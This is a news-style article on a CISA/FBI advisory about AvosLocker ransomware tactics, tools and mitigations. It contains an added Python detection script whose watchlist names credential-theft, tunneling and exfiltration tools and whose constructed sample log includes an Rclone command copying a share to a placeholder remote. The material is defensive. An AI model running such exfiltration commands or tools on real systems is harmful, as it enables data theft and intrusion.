In the latest revelation from the cybersecurity frontlines, the AvosLocker ransomware gang has once again emerged as a significant threat, this time targeting Critical Infrastructure sectors in the United States. A joint advisory by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) sheds light on the gang’s sophisticated tactics, techniques, and procedures (TTPs).
Open-Source Shadows and Living-Off-The-Land Prowess
AvosLocker affiliates exhibit a distinct modus operandi, infiltrating organizations through the cunning use of legitimate software and open-source remote administration tools. Unlike conventional ransomware, they employ exfiltration-based data extortion tactics, threatening to leak or publish stolen data. Notably, the AvosLocker strain, born in mid-2021, boasts a cross-platform reach, affecting Windows, Linux, and VMware ESXi environments.
Tools of the Trade
A hallmark of AvosLocker attacks is their reliance on open-source tools and living-off-the-land (LotL) tactics, which leave few traces for attribution. Familiar utilities like FileZilla and Rclone are repurposed for data exfiltration, while tunneling tools like Chisel and Ligolo play a crucial role. Command-and-control is orchestrated through Cobalt Strike and Sliver, with LaZagne and Mimikatz leading the charge in credential theft.
New Components and Strategies
Adding to their arsenal, AvosLocker introduces custom web shells for network access and an executable, NetMonitor.exe, disguising itself as a benign network monitoring tool while functioning as a reverse proxy. This enables threat actors to connect to the host from outside the victim’s network, adding a layer of sophistication to their attack vector.
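Because every tool named in the two sections above is legitimate software, signature-based blocking is of limited use; a practical first step for defenders is to surface executions of these dual-use tools and outbound connections from the NetMonitor.exe reverse proxy for triage. The script below is an added illustration, not code from the advisory or from CISA/FBI: it scans process-creation and network-connection events in a constructed, hypothetical log format (`<timestamp> <host> <event> key=value ...`) and flags lines whose image name matches one of the tools the advisory attributes to AvosLocker affiliates. The log lines, host names and IP addresses are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Dual-use tools named in the advisory. Each is legitimate on its own, so a
# hit is a triage lead to correlate with other telemetry, not proof of compromise.
WATCHED_TOOLS = {
    "rclone": "data exfiltration tool (Rclone)",
    "filezilla": "data exfiltration tool (FileZilla)",
    "chisel": "tunneling tool (Chisel)",
    "ligolo": "tunneling tool (Ligolo)",
    "mimikatz": "credential theft tool (Mimikatz)",
    "lazagne": "credential theft tool (LaZagne)",
    "netmonitor.exe": "reverse proxy posing as a network monitor (NetMonitor.exe)",
}

# Constructed, hypothetical log format: "<timestamp> <host> <event> key=value ..."
# Values may be double-quoted when they contain spaces (e.g. paths under Program Files).
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+(?P<event>\S+)\s*(?P<rest>.*)$")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


@dataclass
class Finding:
    ts: str
    host: str
    event: str
    image: str
    reason: str


def parse_fields(rest: str) -> dict:
    """Turn 'k=v k2="v with spaces"' into a dict, dropping the quotes."""
    return {k: v.strip('"') for k, v in KV_RE.findall(rest)}


def image_basename(path: str) -> str:
    """Normalise Windows and POSIX separators, then take the last path component."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def scan_line(line: str) -> Optional[Finding]:
    """Return a Finding if the event's image matches a watched tool, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    fields = parse_fields(m["rest"])
    image = fields.get("image", "")
    base = image_basename(image)
    for needle, reason in WATCHED_TOOLS.items():
        if needle in base:
            return Finding(m["ts"], m["host"], m["event"], image, reason)
    return None


def scan_lines(lines) -> list:
    """Scan an iterable of log lines and collect all findings in order."""
    return [f for f in (scan_line(line) for line in lines) if f is not None]


# Constructed sample telemetry (not real data): an exfiltration staging step,
# the reverse proxy starting and calling out, and a benign editor launch.
SAMPLE_LOG = [
    r'2023-10-12T03:14:07Z ws-17 process_create image=C:\Users\Public\rclone.exe parent=C:\Windows\System32\cmd.exe cmdline="rclone copy D:\share remote:bucket"',
    r'2023-10-12T03:15:22Z ws-17 process_create image=C:\ProgramData\NetMonitor.exe parent=C:\Windows\explorer.exe',
    r'2023-10-12T03:15:30Z ws-17 network_connect image=C:\ProgramData\NetMonitor.exe dest=203.0.113.45:443 direction=outbound',
    r'2023-10-12T03:16:01Z ws-17 process_create image="C:\Program Files\Notepad++\notepad++.exe" parent=C:\Windows\explorer.exe',
]


def main() -> None:
    for f in scan_lines(SAMPLE_LOG):
        print(f"{f.ts} {f.host} {f.event:<16} {f.image}  <- {f.reason}")


if __name__ == "__main__":
    main()
```

Matching on the image basename is deliberately loose so a renamed copy dropped in a user-writable directory is still caught; in production the same rule should be paired with the advisory's mitigations (application control and restricted remote-access services), since a tool that is allowed to run can be renamed to anything. The NetMonitor.exe process-create hit followed by its own outbound connection is the pattern worth escalating first, because it is the foothold that lets the actor reach the host from outside the network.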
Recommendations for Critical Infrastructure
In response to this escalating threat, CISA and the FBI advocate crucial mitigations for critical infrastructure organizations. These include application controls, limited use of remote desktop services, restrictions on PowerShell usage, mandatory phishing-resistant multi-factor authentication, network segmentation, regular system updates, and maintaining periodic offline backups.
The Ransomware Surge of 2023: A Grim Reality
The cybersecurity landscape of 2023 is witnessing a surge in ransomware attacks, with threat actors deploying their malicious payloads within hours of initial access. Secureworks reports a drastic reduction in median dwell time, indicating a shift towards simpler and quicker operations to evade detection. Exploitation of public-facing applications, stolen credentials, off-the-shelf malware, and external remote services emerge as the primary vectors for these insidious attacks.